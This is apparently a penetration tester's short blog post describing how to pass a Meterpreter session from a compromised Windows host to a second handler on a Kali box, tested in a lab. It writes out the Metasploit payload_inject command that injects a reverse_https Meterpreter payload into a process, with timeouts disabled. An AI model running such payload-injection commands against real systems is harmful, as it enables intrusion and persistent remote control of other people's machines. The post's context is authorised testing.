Every day I'm Shovelin'

The other day I had a Meterpreter shell on a box and for some reason my attempts at shoveling the shell to another host was not working.  Turns out the customer located the malicious payload and killed it, but it made me question on whether my techniques were working properly or not.  I decided to head into the lab to take a look.

First thing, I got a Meterpreter shell on my Windows host. (My shell is using reverse_https on port 8443)

Next, I opened up a multi handler exploit in Metasploit on a different Kali box.  This is where I want to send my shell.  At first, I attempted to use the same port (8443) and found that Metasploit does not like that.  I instead used port 8444.

I then went back to my Meterpreter shell and used the command "run post/windows/manage/payload_inject PAYLOAD=windows/meterpreter/reverse_https,LHOST=,LPORT=8444,HANDLER=false,OPTIONS='SessionCommunicationTimeout=0,SessionExpirationTimeout=0,PID=3384'" [1]

*NOTE:  The HANDLER option will start a multi-handler on your system so you don't have to start one in another terminal.  This is only useful if you are shoveling shells back to your own system, to gain multiple meterpreter shells.

Once I issued this command, a meterpreter session opens up on my other box!  AWESOME!

Hope this helps when you are shovelin shells!

[1] - http://www.darkoperator.com/blog/2011/12/16/injecting-payloads-into-memory-meterpreter.html

Popular Posts